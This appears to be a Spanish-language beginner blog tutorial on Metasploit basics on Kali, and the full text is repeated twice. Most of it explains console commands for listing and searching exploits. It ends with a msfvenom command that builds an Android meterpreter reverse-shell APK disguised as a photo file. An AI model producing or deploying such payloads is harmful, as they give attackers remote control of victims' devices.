Sin duda una de las herramientas mas importantes en la actualidad
Metasploit framework es una suit de ataque y generacion de exploits y multiplicidad de herramientas en una interfaz de consola que nos sirve para realizar pruebas de penetracion a computadoras y sistemas informaticos para verificar vulneravilidades
aqui les traigo un pequeño tutorial de comandos sencillos para los que van iniciando y pronto realizare unos con cosas mas avanzadas
El escenario es una maquina con Kali 2.0 corei-3 SSD estado solido 128g y 6 g de RAM
el primer comando inicando al consola desde kali
msfconsle
nos aparece al version 4.11.21
exploit 1533
payloads 438
auxiliares 893
encoders 38
nobs 8
post 264
esta muy completo
el comando "banner" solo cambiara la imagen de incio a las multiples imagenes disponibles.
el siguiente comando nos indicara las opciones disponibles "show options".
Despues ya podemos hacer una busqueda avanzada de exploits por ejemplo"show exploits" tardara un poco y nos dara una lista mas extensa de los exploits disponibles.
Aparece al lsita de exploits que afectan a OSX Windows Linux IOS Andorid .....1337..etc
de izquierda a derecha nos dara
-NAME el nombre del exploit
-DISCLORSURE que es la fecha de lanzamiento
-RANK que tan bueno es el exploit y que tan usado
-DESCRIPTION el proceso que realiza o como afecta al equipo
Tomaremos un ejemplo de uno para OSX
osx/local/nfs_mount_root normal Mac OS X NFS Mount Privilege Escalation Exploit
usamos el comando "info osx/local/nfs_mount_root " para revisarlos indivudualmente
Igualmente podemos revisarlos mas detalladamente en la pagina oficial de Metasploit
Donde nos aparecen los autores codigo fuente y toda al informacion rquerida para ver si el exploit es de nuestro agrado o de que manera se puede explotar mejor
De igual manera podemos hacer una busqueda avanzada para buscar un sistema o una vulnerabilidad en especial en este caso "search android"
Aparcera toda al lista disponible y combinadolo con el comando info podremos encontrar el mas adecuado a nuestras necesidades o al sistema que queremos comprometer
Otro comando interesante es "?" que nos dara toda al lista de comandos de msfconsole
y el comando "clear" nos permite borrar los comandos de consola.
Por ultimo generaremos un exploit para android con una apk maliciosa y la pondremos en la ruta de nuestro escritorio "[email protected]:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.78 LPORT=555 R > /root/Escritorio/veranofotos.apk" dependiendo nuestra IP y el puerto que usemos tendremos que cambiar los rangos de IP y el numero de puerto.
Ya hemos generado nuestra apk maliciosa y aparece en nuestro escritorio ya solo falta explotarla lo hare en otro post por que es necesario conocer bien lo que estamos haciendo ,
y ver que hay otros exploit ademas de "payload/windows/meterpreter/reverse_tcp"
Metasploit framework es una suit de ataque y generacion de exploits y multiplicidad de herramientas en una interfaz de consola que nos sirve para realizar pruebas de penetracion a computadoras y sistemas informaticos para verificar vulneravilidades
aqui les traigo un pequeño tutorial de comandos sencillos para los que van iniciando y pronto realizare unos con cosas mas avanzadas
El escenario es una maquina con Kali 2.0 corei-3 SSD estado solido 128g y 6 g de RAM
el primer comando inicando al consola desde kali
msfconsle
nos aparece al version 4.11.21
exploit 1533
payloads 438
auxiliares 893
encoders 38
nobs 8
post 264
esta muy completo
el comando "banner" solo cambiara la imagen de incio a las multiples imagenes disponibles.
el siguiente comando nos indicara las opciones disponibles "show options".
Despues ya podemos hacer una busqueda avanzada de exploits por ejemplo"show exploits" tardara un poco y nos dara una lista mas extensa de los exploits disponibles.
Aparece al lsita de exploits que afectan a OSX Windows Linux IOS Andorid .....1337..etc
de izquierda a derecha nos dara
-NAME el nombre del exploit
-DISCLORSURE que es la fecha de lanzamiento
-RANK que tan bueno es el exploit y que tan usado
-DESCRIPTION el proceso que realiza o como afecta al equipo
Tomaremos un ejemplo de uno para OSX
osx/local/nfs_mount_root normal Mac OS X NFS Mount Privilege Escalation Exploit
usamos el comando "info osx/local/nfs_mount_root " para revisarlos indivudualmente
Igualmente podemos revisarlos mas detalladamente en la pagina oficial de Metasploit
Donde nos aparecen los autores codigo fuente y toda al informacion rquerida para ver si el exploit es de nuestro agrado o de que manera se puede explotar mejor
De igual manera podemos hacer una busqueda avanzada para buscar un sistema o una vulnerabilidad en especial en este caso "search android"
Aparcera toda al lista disponible y combinadolo con el comando info podremos encontrar el mas adecuado a nuestras necesidades o al sistema que queremos comprometer
Otro comando interesante es "?" que nos dara toda al lista de comandos de msfconsole
y el comando "clear" nos permite borrar los comandos de consola.
Por ultimo generaremos un exploit para android con una apk maliciosa y la pondremos en la ruta de nuestro escritorio "[email protected]:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.78 LPORT=555 R > /root/Escritorio/veranofotos.apk" dependiendo nuestra IP y el puerto que usemos tendremos que cambiar los rangos de IP y el numero de puerto.
Ya hemos generado nuestra apk maliciosa y aparece en nuestro escritorio ya solo falta explotarla lo hare en otro post por que es necesario conocer bien lo que estamos haciendo ,
y ver que hay otros exploit ademas de "payload/windows/meterpreter/reverse_tcp"